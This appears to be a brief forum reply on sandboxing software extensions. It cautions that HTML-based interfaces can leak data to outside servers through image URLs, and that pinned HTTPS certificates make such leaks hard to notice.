- Give extensions the ability to do whatever they want (in the sense of not requiring them to only call your specific API signatures), but run then in a sandbox, so that they have to ask for access to the internet, filesystem, and so on?
Certainly not the worst approach, but it might turn out far less watertight than hoped. E.g. plenty of places in html-based UI where you can sneak in an URL that pulls some image, with all the data sent upstream you can fit in a GET. And good luck noticing, when everything is on https and someone decided that certificates should be pinned.
- Give extensions the ability to do whatever they want (in the sense of not requiring them to only call your specific API signatures), but run then in a sandbox, so that they have to ask for access to the internet, filesystem, and so on?